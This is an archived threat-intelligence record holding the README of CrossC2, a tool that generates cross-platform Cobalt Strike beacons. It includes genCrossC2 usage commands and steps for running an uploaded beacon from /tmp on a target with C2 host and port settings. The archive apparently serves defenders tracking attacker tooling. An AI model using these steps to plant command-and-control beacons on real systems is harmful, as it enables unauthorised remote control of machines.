{
	"id": "6c8c6e01-a372-4cb1-9965-d73c1d7d532f",
	"created_at": "2026-04-06T00:15:07.206506Z",
	"updated_at": "2026-04-10T03:20:54.364715Z",
	"deleted_at": null,
	"sha1_hash": "f36edc47e36997a52e02fedd686f5bd0ec5933c1",
	"title": "GitHub - gloxec/CrossC2: generate CobaltStrike's cross-platform payload",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3629096,
	"plain_text": "GitHub - gloxec/CrossC2: generate CobaltStrike's cross-platform\r\npayload\r\nBy gloxec\r\nArchived: 2026-04-05 16:45:08 UTC\r\nCrossC2 framework\r\nppllaattffoorrmm Linux\r\n ppllaattffoorrmm macOS iissssuueess 117744 cclloosseedd rreelleeaassee v3.3 RReelleeaassee DDoowwnnllooaadd 100k\r\nREADME | 中文文档 | README_FULL | 中文完整文档\r\nCobaltStrike support\r\nSupport CobaltStrike's security assessment of other platforms (Linux/MacOS/...), and include the development\r\nsupport of Unix post-penetration module\r\nCS3.14(bug fixes) CS4.0 CS4.X (4.1~4.8)\r\nMaster branch ✅\r\ncs4.0 branch ✅\r\ncs4.1 branch ✅\r\nRelease Page \u003c= v2.1 ✅\r\nRelease Page \u003e= v2.2 ✅\r\nhttps://github.com/gloxec/CrossC2\r\nPage 1 of 4\n\nUsage\r\n1. Download\r\nDownload CrossC2.cna genCrossC2 CrossC2Kit, modify CrossC2.cna configuration\r\n2. Create listener and copy key\r\nCreate windows/beacon_https/reverse_https listener\r\nCopy .cobaltstrike.beacon_keys in teamserver directory to local\r\n3. Function extension\r\nAdd CrossC2Kit_Loader.cna , including memory loading and other functions\r\ncs4.x version file management, process list function is missing, you must use this Loader to restart\r\n4. Generate beacon\r\nUse the GUI function provided by cli or cna to generate beacon by default\r\ngenCrossC2 \u003clistener-ip/domain\u003e \u003clistener-port\u003e \u003cbeacon_keys\u003e\r\n\u003crebind_library;config.ini;c2profile.profile\u003e \u003ctarget_platform\u003e \u003ctarget_arch\u003e\r\nex:\r\n1. read BEACON_KEY from current path and generate BEACON of default C2Profile traffic protocol\r\n genCrossC2 127.0.0.1 5555 null null Linux x64 beacon.out\r\n \r\n2. specify the BEACON of the custom protocol dynamic library\r\n genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys c2profile.so MacOS x64 beacon.out\r\nhttps://github.com/gloxec/CrossC2\r\nPage 2 of 4\n\n3. specify the C2Profile that needs to be automatically parsed\r\n genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys \";;c2profile.profile\" Linux x64 beacon.out\r\nmore advanced configuration can be found in the documentation: 📄Reference\r\n5. Run beacon\r\nRun the one-click online script generated by the CrossC2 plugin on the target\r\nAfter uploading the beacon to the target machine for empowered operation\r\nSet the working directory for beacon and run: export CCPATH=/opt/ \u0026\u0026 /tmp/c2\r\nTemporarily specify the protocol library for beacon and run: /tmp/c2 /tmp/c2-rebind.so\r\nTemporarily set C2 configuration for beacon: export CCHOST=127.0.0.1 \u0026\u0026 export CCPORT=443 \u0026\u0026\r\n/tmp/c2\r\nSet DEBUG to view the online status of beacon: export CCDEBUG=1 \u0026\u0026 /tmp/c2\r\nCrossC2Kit\r\nCrossC2Kit: https://github.com/CrossC2/CrossC2Kit\r\nCrossC2Kit is an infiltration expansion around the Unix platform derived from CrossC2. Use Aggressor Script\r\nOpen Source Script engine. It can be used to create automation to simulate the operation process of the Red Team\r\nand expand the CobaltStrike client.\r\nCrossC2Kit is inherited from the original features of CobaltStrike, so the development and writing grammar still\r\nrefer to the official documentation: https://trial.cobaltstrike.com/aggressor-script/index.html\r\nBut it has some API extensions on top of CrossC2 to control the beacon of the Unix platform\r\nAPI: 📄Reference\r\nhttps://github.com/gloxec/CrossC2\r\nPage 3 of 4\n\nDemo:\r\nNote\r\nOnly for internal use by enterprises and organizations, this framework has a certain degree of\r\ninstability. Non-professionals are not allowed to use it. Anyone shall not use it for illegal purposes\r\nand profitability. Besides that, publishing unauthorized modified version is also prohibited, or\r\notherwise bear legal responsibilities.\r\nTodo\r\n1. http-proxy (auth) \u0026 socks proxy back connection support\r\n2. node beacon? (Single node type, can host other beacon without relying on teamserver)\r\n3. Linux \u0026 MacOS side so/dylib's reverse shell support, and its derivative process injection functions\r\nThank\r\nThanks to @Emma for the Logo designed for CrossC2, which is designed in the style of Armitage and\r\nCobaltStrike series\r\nSource: https://github.com/gloxec/CrossC2\r\nhttps://github.com/gloxec/CrossC2\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://github.com/gloxec/CrossC2"
	],
	"report_names": [
		"CrossC2"
	],
	"threat_actors": [],
	"ts_created_at": 1775434507,
	"ts_updated_at": 1775791254,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f36edc47e36997a52e02fedd686f5bd0ec5933c1.pdf",
		"text": "https://archive.orkl.eu/f36edc47e36997a52e02fedd686f5bd0ec5933c1.txt",
		"img": "https://archive.orkl.eu/f36edc47e36997a52e02fedd686f5bd0ec5933c1.jpg"
	}
}